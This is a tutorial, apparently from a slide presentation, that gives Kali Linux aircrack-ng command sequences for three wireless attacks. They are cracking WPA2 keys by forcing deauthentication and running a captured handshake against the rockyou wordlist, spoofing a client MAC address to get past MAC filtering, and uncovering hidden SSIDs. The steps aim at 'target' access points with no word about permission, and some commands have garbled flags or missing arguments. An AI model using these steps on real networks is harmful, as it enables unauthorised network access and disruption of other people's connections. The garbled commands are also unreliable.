Breaking WPA2 Wireless

What is WPA?

• Wi-Fi Protected Access


• Encrypts plain text to Cipher text


• Can be Decrypted only if the key is known

Breakng WPA2 Wireless

Platform:-

  kali-linux v1.0.6

Download from:-

  http://www.kali.org

Requirements:-

# airmon-ng:

To start Wireless monitoring

# airodump-ng:

To discover access points

# aireplay-ng:

To reassociate access points

# aircrack-ng:

To decrypt WPA2 password

Step 1

Check is the Wireless Card is being recognized by the OS.

Command:

 # airmon-ng

Step 2

Create a Monitoring Interface(mon0) on the Wireless Interface

Command:

 # airmon-ng start wlan0

Step 3

Check for Access points in Range through mon0interface

Command:

 # airodump-ng mon0

Step 4

Capture & Write the WPA handshake information to a File which will contain the Encrypted key.

Command:

 # airodump-ng -w <FILENAME> -c 11 --bssid <target MAC> mon0

-c --> fixing channel to monitor
-w --> writes data to filename specified

Step 5

Send DeAuthentication packets to the Access Point to Disassociate the clients of that Access Point to capture Handshake Data when clients reconnect.

Command:

 # aireplay-ng -0 0 -a <target MAC> mon0

-a --> fixing MAC of targetted Access Point
-0 0 --> send infinite Deauthentication packets

Stop when WPA-handshake is captured.

Step 6

Matching WPA2 handshake encryption packets with wordlist

Command:

 # aircrack-ng <FILENAME-01.cap> -w <path to wordlist>

-w --> fixing filename path to wordlist

We have readymade wordlist available in Kali-linux at Path: /usr/share/wordlists/rockyou.txt

Task Accomplished!

So we should be able to Connect to the Wireless Access Point by using the aquired key.

Bypassing MAC address filters

What is MAC filtering?

• MAC addresses are uniquely assigned to each device.


• MAC Filtering is security access control technique in which address assigned to each network card is used to determine its access to the network.


• It allows or denies access to only specific devices whose MAC address are already registered at the Access Point.

Working

Bypassing Wireless MAC Filter on an Access Point

Platform:-

  kali-linux v1.0.6

Download from:-

  http://www.kali.org

Requirements:-

# airmon-ng:

To start Wireless monitoring

# airodump-ng:

To discover access points

# macchanger:

To change MAC address

Step 1

Verify if the Wireless card is detected by the OS.

Command:

 # airmon-ng

Step 2

Create and start a Logical Monitoring Interface to monitor data packets on wireless network.

Command:

 # airmon-ng start wlan0

Step 3

Check for Access Points by capturing all Wireless Data Packets in range.

Command:

 # airodump-ng mon0

Select an Access Point to attack and take a note of its Channel

Step 4

Catch only targetted Access Points data packets by using its Channle and MAC address.

Command:
 # airodump-ng -c 11 -a -bssid <Target AP MAC> mon0

-a --> fixing the MAC address
-c --> setting the channel

Step 5

Send DeAuthentication packets to disassociate connected clients in order to capture SSID name while ReAssociation
(Deauthentication Attack)

Command:

 # aireplay-ng -0 0 -a <Target MAC> mon0

-a --> fixing the MAC address
-0 --> sending Infinite number of packets

Step 5

This will give you the SSID of the hidden Access Point

Step 6

Change our machine's MAC address to the Associated Client's MAC address

To change our MAC address we have to stop mon0.

Command:

 # airmon-ng stop wlan0

Step 7

Time to change our machine's MAC address!

Command:

 # macchanger -m <new MAC> wlan0

Step 8

Restart the wlan0 interface.

Command:

 # ifconfig wlan0 down
 # ifconfig wlan0 up

Task Accomplished!

Now You Should be able to Connect to the Targeted Wireless Access Point.

Finding Hidden SSIDs

What is an SSID?

• SSID is short for service set identifier.


• An SSID is a unique ID or name that distinguishes itself among various wireless networks and avoid overlapping.


• SSIDs have a maximum length of 32 characters.

Discovering an "Access Point" that is "Hiding" itself

Requirements:-

# airmon-ng:

To start Wireless monitoring

# airodump-ng:

To discover access points

# aireplay-ng:

To reassociate access points

Step 1

To check if the Wireless Card is being recognized by the OS

Command:

 # airmon-ng

Step 2

Create a "Logical Monitoring Interface" to monitor the Data packets on wlan0

Command:

 # airmon-ng

Step 3

Check for Access Points by Capturing all Wireless Data Packets in Range

Command:

 # airodump-ng mon0

Select an Access Point to attack and take a note of its Channel

Step 4

Restrict Packet Capturing to the channel of the Access Point to be Attacked

Command:

 # airodump-ng -c 11 mon0

-c --> fix channel to monitor

Step 5

Send DeAuthentication packets to disassociate connected clients in order to capture SSID name while ReAssociation

Command:
 # aireplay-ng -0 0 -a <Target MAC> mon0

-a --> fixing the MAC address
-0 --> sending Infinite number of packets

Task Accomplished!

This will give you the SSID of the hidden Access Point